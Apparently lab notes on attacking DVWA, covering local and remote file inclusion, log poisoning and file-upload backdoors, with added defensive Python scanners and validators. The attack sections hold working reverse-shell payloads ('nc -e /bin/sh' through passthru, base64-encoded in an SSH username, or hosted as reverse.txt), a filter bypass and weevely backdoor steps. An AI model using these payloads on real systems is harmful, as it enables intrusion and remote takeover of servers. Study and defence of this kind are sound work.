File Inclusion
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd --> local file inclusion: the page= parameter goes straight into include(), so a traversal path reads /etc/passwd (the list of user accounts; the password hashes are in /etc/shadow, which the web server user normally cannot read)
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ========================== using environment variables
---------------------------------------------------------------------------------------------------------
cat /proc/self/environ --> shows the environment of whichever process reads it; read through the web server it is the Apache/PHP worker's environment, and under CGI the request headers (HTTP_USER_AGENT etc.) are part of it
Opening the environment variables of the target machine
--> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ
--> only works if /proc/self/environ is readable by the web server user and the request headers show up in it; check that your User-Agent is visible in the output before going further
Now intercept the request using Burp Suite -
change the User-Agent header in Burp Suite to PHP code, e.g. <?php phpinfo(); ?> --> the included "file" now contains a PHP tag, so include() executes it and phpinfo() output proves code execution
type in command prompt
--> nc -vv -l -p 8888
type in Burp Suite header (request)
--> <?php passthru("nc -e /bin/sh attacker_ip 8888"); ?> // <?php passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>
--> the short form <?passthru(...);?> only works when short_open_tag is On; nc -e needs a netcat build that supports -e (nc.traditional), OpenBSD nc does not
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================ using logs --> /var/log/auth.log
--> /var/log/apache2/access.log (same idea: the User-Agent of every request is written to the access log, so a PHP tag in the User-Agent poisons it)
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> /var/log/auth.log shows the authentication log; sshd writes failed logins there, including the username that was tried
--> this only works if the log is readable by the web server user; on a stock Debian/Ubuntu install auth.log is root:adm 0640, the lab VM has it readable
--> let's try to log in using "ssh" to the server and check the logs
ssh random@192.168.149.136
random
--> a line "Invalid user random from ..." is logged
ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP
--> the username is written to the log verbatim, but spaces, slashes and quotes inside the nc command are awkward to get through ssh and the logger unchanged, so wrap the command in base64 and let PHP decode it; only the PHP wrapper and a base64 string then travel in the username
need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open Burp Suite, go to Decoder, paste nc -e /bin/sh attacker_ip 8888 and choose Encode as Base64 (or: echo -n 'nc -e /bin/sh attacker_ip 8888' | base64)
--> the encoded string is bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4 (it decodes back to the literal text attacker_ip, so replace attacker_ip with the real address before encoding or the shell tries to connect to a host called attacker_ip)
ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP
--> type in command prompt
nc -vv -l -p 8888
--> now open this (including the poisoned log runs the PHP inside it, and the listener gets the shell)
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> in the nc window type
id
ls
pwd
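Both log-poisoning variants above leave a distinctive trace: a PHP open tag and a shell function inside a log line, and an access-log request that names a log file or /proc/self/environ. The scanner below is an added example (not part of the original notes) that runs those indicators over constructed sshd and Apache lines modelled on the ones this section produces, and decodes any base64_decode() argument it finds so the analyst sees the actual command. The log lines are made up for the example, not copied from a real system.

```python
import base64
import re

# Constructed sample lines modelled on the sshd and Apache entries this
# section poisons; they are NOT copied from a real /var/log/auth.log or
# /var/log/apache2/access.log.
SAMPLE_AUTH_LOG = """\
Apr 14 10:02:11 dvwa sshd[2231]: Invalid user random from 192.168.149.128
Apr 14 10:02:11 dvwa sshd[2231]: input_userauth_request: invalid user random [preauth]
Apr 14 10:03:40 dvwa sshd[2240]: Invalid user <?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?> from 192.168.149.128
Apr 14 10:05:02 dvwa sshd[2251]: Accepted password for alice from 10.0.0.7 port 51022 ssh2
"""

SAMPLE_ACCESS_LOG = """\
192.168.149.128 - - [14/Apr/2024:10:06:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.149.128 - - [14/Apr/2024:10:06:30 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?php passthru('nc -e /bin/sh 192.168.149.128 8888'); ?>"
192.168.149.128 - - [14/Apr/2024:10:07:12 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log HTTP/1.1" 200 9840 "-" "Mozilla/5.0"
"""

# A PHP open tag (<?php, <?= or the short <?) has no business in a log line
# that a web server might later include(). "<?xml" also hits; that is worth a look too.
PHP_TAG = re.compile(r"<\?")
# The functions a poisoned tag typically calls.
DANGEROUS_CALL = re.compile(
    r"\b(passthru|system|shell_exec|exec|popen|proc_open|eval|assert|base64_decode)\s*\(", re.I)
# Request-side indicators: traversal, /proc/self/environ, a log path, PHP
# stream wrappers, or a remote URL being fed to the page= parameter.
LFI_PATTERN = re.compile(
    r"(\.\./){2,}|/proc/self/environ|/var/log/|php://|data:|expect://|[?&]page=[a-z]{4,5}://", re.I)
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_embedded_base64(line):
    """Return the decoded text of every base64_decode('...') argument in the line."""
    out = []
    for blob in B64_ARG.findall(line):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid base64: leave it to the analyst
    return out


def scan_log(text, source):
    """Return (source, line_number, reasons, decoded_payloads) for every
    suspicious line. Clean lines are not reported."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        reasons = []
        if PHP_TAG.search(line):
            reasons.append("php-tag")
        if DANGEROUS_CALL.search(line):
            reasons.append("dangerous-call")
        if LFI_PATTERN.search(line):
            reasons.append("lfi-request")
        if reasons:
            findings.append((source, n, reasons, decode_embedded_base64(line)))
    return findings


def scan_samples():
    """Run both constructed logs through the scanner."""
    return scan_log(SAMPLE_AUTH_LOG, "auth.log") + scan_log(SAMPLE_ACCESS_LOG, "access.log")


if __name__ == "__main__":
    for src, n, reasons, decoded in scan_samples():
        print(f"{src}:{n} {','.join(reasons)} {decoded}")
```

On the constructed input the scanner flags the poisoned sshd line (and recovers "nc -e /bin/sh attacker_ip 8888" from the base64), the environ request with the PHP User-Agent, and the request that pulls auth.log through the include; the two normal sshd lines and the ordinary page=include.php request are not reported. Point it at real logs with `scan_log(open(path).read(), path)`.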
===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================
It is a special case of file inclusion. If the server is configured with the PHP options allow_url_fopen = On and allow_url_include = On, include() will fetch a file from any computer the target can reach over the network and execute it on the target. We can therefore host any PHP file ourselves and run payloads, reverse shells and system commands on the target.
In DVWA (on this lab VM) remote file inclusion is turned off, we need to turn it on:
sudo nano /etc/php5/cgi/php.ini (path on this lab VM; on current Debian/Ubuntu installs it is /etc/php/<version>/apache2/php.ini)
ctrl+w --> search for allow_url and set allow_url_fopen and allow_url_include to "On"
ctrl+x
yes
sudo /etc/init.d/apache2 restart
The file should be stored on a real server with an IP that is reachable from the target:
<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>
save it as reverse.txt in /var/www/html (.txt rather than .php, so our own web server serves the source instead of executing it on our machine)
open it as http://localhost/reverse.txt --> it must be reachable remotely if you want to hack a real server
in cmd type
--> nc -vv -l -p 8080
run this now ...
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?
--> the trailing ? turns anything the script appends to the filename into a query string of our URL instead of breaking the path
whoami
uname -a
ls
pwd
==========================================================================================================
-------------------------- Remote File Inclusion - Medium Security -------------
===========================================================================================================
medium security strips the literal strings "http://" and "https://" from page=, but the replacement is case-sensitive, so a mixed-case scheme passes through untouched and PHP still treats it as a URL
nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?
securing from Remote File Inclusion:
sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "Off"
allow_url_include = Off
--> allow_url_fopen = Off as well if nothing on the server needs to open URLs; the real fix is in the code: never pass user input to include(), use an allowlist of page names, and compare case-insensitively if you must filter
ctrl+x
yes
sudo /etc/init.d/apache2 restart
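The page-parameter check the DVWA code should be doing is shown below as an added example (Python rather than PHP, because the logic is what matters; it is not DVWA's or the course's code). `medium_filter` models the case-sensitive blacklist that the hTTp:// trick gets past, and `safe_resolve` is the hardened version: wrapper and remote schemes are rejected case-insensitively, the path is canonicalised so ../ and absolute paths collapse, and the result must be a regular file inside the include directory. The page names include.php and file1.php and the throwaway directory are assumptions made for the demo.

```python
import os
import tempfile


def medium_filter(page):
    """Blacklist modelled on a case-sensitive str_replace(): strips the literal
    strings "http://", "https://", "../" and "..\\" from the parameter.
    This is the WEAK check; it is here to show what it lets through."""
    for bad in ("http://", "https://", "../", "..\\"):
        page = page.replace(bad, "")
    return page


# Schemes and PHP stream wrappers that must never reach include(), compared
# case-insensitively so that hTTp:// is caught as well as http://.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://",
                  "data:", "expect://", "file://", "phar://", "\\\\")


def is_remote(page):
    return page.strip().lower().startswith(REMOTE_SCHEMES)


def safe_resolve(page, base_dir):
    """Hardened check: return the absolute path of the page to include, or raise
    ValueError. Rejects wrapper/remote schemes and NUL bytes up front, then
    canonicalises the path (collapsing ../, absolute paths and symlinks) and
    requires the result to be an existing regular file inside base_dir."""
    if "\x00" in page or is_remote(page):
        raise ValueError("remote or wrapper scheme / NUL byte")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base or not os.path.isfile(target):
        raise ValueError("outside base directory or not a regular file")
    return target


def demo():
    """Build a throwaway docroot holding only the legitimate pages (assumed
    names) and run the payloads used in this section through both checks.
    Returns {payload: (what the weak filter leaves, hardened check accepts?)}."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        for name in ("include.php", "file1.php"):
            with open(os.path.join(base, name), "w") as fh:
                fh.write("<?php echo 'legit page'; ?>\n")
        payloads = [
            "include.php",                                   # legitimate
            "/../../../../../../../etc/passwd",              # LFI from this page
            "....//....//etc/passwd",                         # survives a single ../ strip
            "http://192.168.149.128/reverse.txt?",            # RFI, low
            "hTTp://192.168.149.128/reverse.txt?",            # RFI, medium bypass
            "php://filter/convert.base64-encode/resource=include.php",  # source disclosure
        ]
        for p in payloads:
            try:
                safe_resolve(p, base)
                accepted = True
            except ValueError:
                accepted = False
            results[p] = (medium_filter(p), accepted)
    return results


if __name__ == "__main__":
    for payload, (after_filter, accepted) in demo().items():
        print(f"{payload!r:60} weak->{after_filter!r:40} hardened accepts={accepted}")
```

Two things the output makes visible: the weak filter turns `/../../../../../../../etc/passwd` into `/etc/passwd`, which is still an absolute path include() will happily open, and it reduces `....//....//etc/passwd` to `../../etc/passwd` because it only makes one pass; the hardened check accepts nothing but `include.php`. Pair this with `allow_url_include = Off`, the allowlist is the primary control and the ini setting the backstop.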
File upload vulnerability:
--------------------------
Generate a web payload (a PHP backdoor) and gain a remote connection through it:
--> weevely generate 123456 /root/Desktop/shell.php // 123456 is the password
To run it once the file is on the target:
--> weevely link_of_shell password
If the upload form only checks the extension on the client side or trusts the Content-Type header: change the extension of the file from .php to .jpg so it passes the check,
then modify the request in Burp Suite while uploading the file and change the extension back from .jpg to .php (the Content-Type stays image/jpeg), so the server stores it as executable PHP
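The rename-and-intercept trick works because the server is validating values the client controls (file name, Content-Type header). The added example below (not the course's or DVWA's code) contrasts that with a server-side check that allowlists the extension, verifies the file's magic bytes, refuses bodies containing a PHP open tag and assigns its own random file name. The upload bodies are constructed for the example; the PHP payload is the reverse shell from the RFI section above.

```python
import secrets

# Magic bytes for the image types the form is allowed to accept.
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": PNG_MAGIC}
# Only the unambiguous long tags: a bare "<?" would also match the XMP
# metadata header "<?xpacket" that real JPEGs carry, and "<?=" is short
# enough to occur by chance in binary data. This check is best effort; the
# storage location (below) is what actually prevents execution.
PHP_MARKERS = (b"<?php", b'<script language="php"')

# Constructed sample bodies (not real uploads): the reverse shell used in the
# RFI section, a minimal JPEG carrying an XMP block, and a JPEG/PHP polyglot.
PHP_SHELL = b'<?php\npassthru("nc -e /bin/sh 192.168.149.128 8080");\n?>\n'
REAL_JPEG = (JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00\x01"
             + b"<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?>" + b"\xff\xd9")
POLYGLOT = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00\x01" + PHP_SHELL + b"\xff\xd9"


def weak_check(content_type):
    """A Content-Type-only check: trusts a header the client sets, so editing
    the header in Burp (or renaming shell.php to shell.jpg) gets past it."""
    return content_type in ("image/jpeg", "image/png")


def strong_check(filename, content):
    """Server-side validation: allowlist the extension, require the bytes to
    start with that type's magic, refuse bodies carrying a PHP open tag, and
    return a server-generated name (the client's name is never reused).
    Store the result outside the docroot, or in a directory where PHP
    execution is disabled, so that even a miss here is not code execution."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    if not content.startswith(ALLOWED[ext]):
        raise ValueError("content does not match declared type")
    if any(marker in content for marker in PHP_MARKERS):
        raise ValueError("embedded PHP tag")
    return f"{secrets.token_hex(16)}.{ext}"


def run_samples():
    """Run the upload attempts from this section through both checks.
    Returns a list of (label, weak_check passes, strong_check verdict)."""
    samples = [
        ("shell.php sent as application/x-php", "shell.php", "application/x-php", PHP_SHELL),
        ("shell.jpg with PHP bytes", "shell.jpg", "image/jpeg", PHP_SHELL),
        ("shell.php sent as image/jpeg (Burp rename)", "shell.php", "image/jpeg", PHP_SHELL),
        ("photo.jpg real JPEG", "photo.jpg", "image/jpeg", REAL_JPEG),
        ("poly.jpg JPEG with PHP appended", "poly.jpg", "image/jpeg", POLYGLOT),
    ]
    out = []
    for label, name, ctype, body in samples:
        try:
            stored = strong_check(name, body)
            verdict = "stored as ." + stored.rsplit(".", 1)[-1]
        except ValueError as exc:
            verdict = f"rejected: {exc}"
        out.append((label, weak_check(ctype), verdict))
    return out


if __name__ == "__main__":
    for label, weak_ok, verdict in run_samples():
        print(f"{label:45} weak={'pass' if weak_ok else 'fail'}  strong={verdict}")
```

The Burp-renamed request (shell.php with Content-Type image/jpeg) sails through the weak check and is the exact case the notes exploit; the strong check rejects it on extension, rejects shell.jpg on magic bytes, rejects the polyglot on the embedded `<?php`, and stores the real JPEG (XMP header included) under a name the attacker never chose.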